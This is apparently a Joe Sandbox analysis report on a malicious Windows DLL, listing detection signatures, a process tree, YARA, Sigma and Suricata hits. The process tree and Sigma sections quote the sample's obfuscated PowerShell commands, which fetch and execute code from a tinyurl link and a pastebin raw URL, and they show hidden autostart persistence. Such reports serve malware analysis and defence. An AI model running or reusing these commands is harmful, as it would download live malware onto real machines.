Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5UIy3bo46y.dll

Overview

General Information

Sample name:5UIy3bo46y.dll
(renamed file extension from exe to dll, renamed because original name is a hash value)
Original sample name:0b9acce9a60dda0df4fdc61eb954433a5bff023ab04e38aca2c2f18aad70c3f3.exe
Analysis ID:1534111
MD5:674fb5fd30f3b299608e7d439f1bd3e7
SHA1:b3dabd98de642f0611b7d10f9602375f31b28f1b
SHA256:0b9acce9a60dda0df4fdc61eb954433a5bff023ab04e38aca2c2f18aad70c3f3
Tags:exeNeth3Nuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Obfuscated command line found
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Uses cmd line tools excessively to alter registry or file data
Connects to a URL shortener service
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 5680 cmdline: loaddll64.exe "C:\Users\user\Desktop\5UIy3bo46y.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 5104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2144 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 6944 cmdline: rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • powershell.exe (PID: 7180 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 8068 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • regsvr32.exe (PID: 5820 cmdline: regsvr32.exe /s C:\Users\user\Desktop\5UIy3bo46y.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
      • powershell.exe (PID: 7172 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8080 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • rundll32.exe (PID: 5060 cmdline: rundll32.exe C:\Users\user\Desktop\5UIy3bo46y.dll,DllRegisterServer MD5: EF3179D498793BF4234F708D3BE28633)
      • powershell.exe (PID: 6448 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7352 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 8148 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1652 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 3020 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 2864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2380 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4240 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6448INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1d893:$b1: ::WriteAllBytes(
  • 0x22aa9:$b1: ::WriteAllBytes(
  • 0xb3728:$b1: ::WriteAllBytes(
  • 0xb7f9a:$b1: ::WriteAllBytes(
  • 0x169bd:$s1: -join
  • 0x2d568:$s1: -join
  • 0x2d5a3:$s1: -join
  • 0x2d67e:$s1: -join
  • 0x2d6ac:$s1: -join
  • 0x2d9f8:$s1: -join
  • 0x2da1b:$s1: -join
  • 0x2dd55:$s1: -join
  • 0x2dd76:$s1: -join
  • 0x2dda8:$s1: -join
  • 0x2ddf0:$s1: -join
  • 0x2de1d:$s1: -join
  • 0x2de44:$s1: -join
  • 0x2de6f:$s1: -join
  • 0x2de8b:$s1: -join
  • 0x2df52:$s1: -join
  • 0x2e3f0:$s1: -join
Process Memory Space: powershell.exe PID: 7172INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x32aa2:$b1: ::WriteAllBytes(
  • 0xb6b8b:$b1: ::WriteAllBytes(
  • 0x12a0b8:$b1: ::WriteAllBytes(
  • 0x7dc87:$s1: -join
  • 0xaae19:$s1: -join
  • 0xc4028:$s1: -join
  • 0xc41e5:$s1: -join
  • 0xdf171:$s1: -join
  • 0xdf8d1:$s1: -join
  • 0x18ea10:$s1: -join
  • 0x19ab14:$s1: -join
  • 0x19021:$s3: reverse
  • 0x1930f:$s3: reverse
  • 0x19a29:$s3: reverse
  • 0x1a1e2:$s3: reverse
  • 0x213d5:$s3: reverse
  • 0x217ef:$s3: reverse
  • 0x22377:$s3: reverse
  • 0x23024:$s3: reverse
  • 0xebf77:$s3: reverse
  • 0xf789d:$s3: reverse
Process Memory Space: powershell.exe PID: 7180INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x42b2:$b1: ::WriteAllBytes(
  • 0x2ed93:$b1: ::WriteAllBytes(
  • 0x8b301:$b1: ::WriteAllBytes(
  • 0xfbd4c:$b1: ::WriteAllBytes(
  • 0xa85b:$s1: -join
  • 0x159e5:$s1: -join
  • 0xbe995:$s1: -join
  • 0xc2d47:$s1: -join
  • 0xc2f04:$s1: -join
  • 0xdea52:$s1: -join
  • 0xdf1b2:$s1: -join
  • 0x4a67d:$s3: reverse
  • 0x512d2:$s3: reverse
  • 0x532b9:$s3: reverse
  • 0x5e2e8:$s3: reverse
  • 0x6f1e4:$s3: reverse
  • 0x7694e:$s3: reverse
  • 0x1348b2:$s3: reverse
  • 0x134ba0:$s3: reverse
  • 0x1352ba:$s3: reverse
  • 0x135a73:$s3: reverse
Process Memory Space: powershell.exe PID: 7352INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x8f2b8:$b1: ::WriteAllBytes(
  • 0x99753:$b1: ::WriteAllBytes(
  • 0x2ac4f5:$b1: ::WriteAllBytes(
  • 0x8310:$s1: -join
  • 0x834b:$s1: -join
  • 0x8426:$s1: -join
  • 0x8454:$s1: -join
  • 0x87a6:$s1: -join
  • 0x87c9:$s1: -join
  • 0x8b03:$s1: -join
  • 0x8b24:$s1: -join
  • 0x8b56:$s1: -join
  • 0x8b9e:$s1: -join
  • 0x8bcb:$s1: -join
  • 0x8bf2:$s1: -join
  • 0x8c1d:$s1: -join
  • 0x8c39:$s1: -join
  • 0x8d00:$s1: -join
  • 0x91a3:$s1: -join
  • 0x91c5:$s1: -join
  • 0x921d:$s1: -join
Process Memory Space: powershell.exe PID: 5844INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x4d4cf:$b1: ::WriteAllBytes(
  • 0x6463e:$b1: ::WriteAllBytes(
  • 0x6d1a3:$b1: ::WriteAllBytes(
  • 0x74956:$b1: ::WriteAllBytes(
  • 0x160fdd:$s1: -join
  • 0x16173d:$s1: -join
  • 0x17a9ef:$s1: -join
  • 0x181d71:$s1: -join
  • 0x2e5c:$s3: reverse
  • 0x314a:$s3: reverse
  • 0x3864:$s3: reverse
  • 0x4d91:$s3: reverse
  • 0x51ab:$s3: reverse
  • 0x5d33:$s3: reverse
  • 0x6822:$s3: reverse
  • 0xce1a:$s3: reverse
  • 0xb24ce:$s3: reverse
  • 0xbde32:$s3: reverse
  • 0xeca5f:$s3: reverse
  • 0xed01a:$s3: reverse
  • 0x104b98:$s3: reverse
Click to see the 1 entries

Other

SourceRuleDescriptionAuthorStrings
amsi64_6448.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xd1fd:$b1: ::WriteAllBytes(
  • 0xb902:$s1: -join
  • 0x50ae:$s4: +=
  • 0x5170:$s4: +=
  • 0x9397:$s4: +=
  • 0xb4b4:$s4: +=
  • 0xb79e:$s4: +=
  • 0xb8e4:$s4: +=
  • 0xf927:$s4: +=
  • 0xf9a7:$s4: +=
  • 0xfa6d:$s4: +=
  • 0xfaed:$s4: +=
  • 0xfcc3:$s4: +=
  • 0xfd47:$s4: +=
  • 0xd297:$e4: Get-WmiObject
  • 0xd339:$e4: Get-WmiObject
  • 0xde10:$e4: Get-WmiObject
  • 0xdfff:$e4: Get-Process
  • 0xe057:$e4: Start-Process
amsi64_7172.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xd1fd:$b1: ::WriteAllBytes(
  • 0xb902:$s1: -join
  • 0x50ae:$s4: +=
  • 0x5170:$s4: +=
  • 0x9397:$s4: +=
  • 0xb4b4:$s4: +=
  • 0xb79e:$s4: +=
  • 0xb8e4:$s4: +=
  • 0xf927:$s4: +=
  • 0xf9a7:$s4: +=
  • 0xfa6d:$s4: +=
  • 0xfaed:$s4: +=
  • 0xfcc3:$s4: +=
  • 0xfd47:$s4: +=
  • 0xd297:$e4: Get-WmiObject
  • 0xd339:$e4: Get-WmiObject
  • 0xde10:$e4: Get-WmiObject
  • 0xdfff:$e4: Get-Process
  • 0xe057:$e4: Start-Process
amsi64_7180.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xd1fd:$b1: ::WriteAllBytes(
  • 0xb902:$s1: -join
  • 0x50ae:$s4: +=
  • 0x5170:$s4: +=
  • 0x9397:$s4: +=
  • 0xb4b4:$s4: +=
  • 0xb79e:$s4: +=
  • 0xb8e4:$s4: +=
  • 0xf927:$s4: +=
  • 0xf9a7:$s4: +=
  • 0xfa6d:$s4: +=
  • 0xfaed:$s4: +=
  • 0xfcc3:$s4: +=
  • 0xfd47:$s4: +=
  • 0xd297:$e4: Get-WmiObject
  • 0xd339:$e4: Get-WmiObject
  • 0xde10:$e4: Get-WmiObject
  • 0xdfff:$e4: Get-Process
  • 0xe057:$e4: Start-Process
amsi64_7352.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xd1fd:$b1: ::WriteAllBytes(
  • 0xb902:$s1: -join
  • 0x50ae:$s4: +=
  • 0x5170:$s4: +=
  • 0x9397:$s4: +=
  • 0xb4b4:$s4: +=
  • 0xb79e:$s4: +=
  • 0xb8e4:$s4: +=
  • 0xf927:$s4: +=
  • 0xf9a7:$s4: +=
  • 0xfa6d:$s4: +=
  • 0xfaed:$s4: +=
  • 0xfcc3:$s4: +=
  • 0xfd47:$s4: +=
  • 0xd297:$e4: Get-WmiObject
  • 0xd339:$e4: Get-WmiObject
  • 0xde10:$e4: Get-WmiObject
  • 0xdfff:$e4: Get-Process
  • 0xe057:$e4: Start-Process
amsi64_5844.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
Click to see the 1 entries

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Source: Process startedAuthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\5UIy3bo46y.dll, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 5820, ParentProcessName: regsvr32.exe, ProcessCommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), ProcessId: 7172, ProcessName: powershell.exe
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\5UIy3bo46y.dll,DllRegisterServer, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5060, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), ProcessId: 6448, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7180, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\5UIy3bo46y.dll,DllRegisterServer, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5060, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), ProcessId: 6448, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T16:00:28.799240+020028576591A Network Trojan was detected192.168.2.752050162.159.128.233443TCP
2024-10-15T16:00:28.800110+020028576591A Network Trojan was detected192.168.2.752049162.159.128.233443TCP
2024-10-15T16:00:38.975597+020028576591A Network Trojan was detected192.168.2.752102162.159.128.233443TCP
2024-10-15T16:00:39.025748+020028576591A Network Trojan was detected192.168.2.752104162.159.128.233443TCP
2024-10-15T16:00:56.974316+020028576591A Network Trojan was detected192.168.2.752203162.159.128.233443TCP
2024-10-15T16:01:03.495587+020028576591A Network Trojan was detected192.168.2.752206162.159.128.233443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 5UIy3bo46y.dllReversingLabs: Detection: 50%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.3% probability
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49770 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49769 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49771 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49768 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52050 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52049 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52102 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52104 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:52114 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:52125 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:52155 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:52167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52203 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52206 version: TLS 1.2
Source: 5UIy3bo46y.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ws\System.Management.Automation.pdbpdbj source: powershell.exe, 00000008.00000002.2164598925.000001851B744000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb089899H5 source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 00000014.00000002.2364833973.000002152C5D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B63000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2197283163.00000148CB321000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbD source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb{Q source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb_7 source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbr source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000008.00000002.2184620731.000001851BA80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb, source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbX source: powershell.exe, 00000008.00000002.2164598925.000001851B744000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.PowerShell.Commands.Utility.pdbi source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbs source: powershell.exe, 00000014.00000002.2372611530.000002152C629000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B09000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2184620731.000001851BA80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2364833973.000002152C580000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8AB6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1774067227.000002476F732000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automationb.pdb&^ source: powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbg source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417120815.000001B76A18A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbX source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000014.00000002.2364833973.000002152C5FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 31bf3856ad364e35corlib.pdb;Q source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
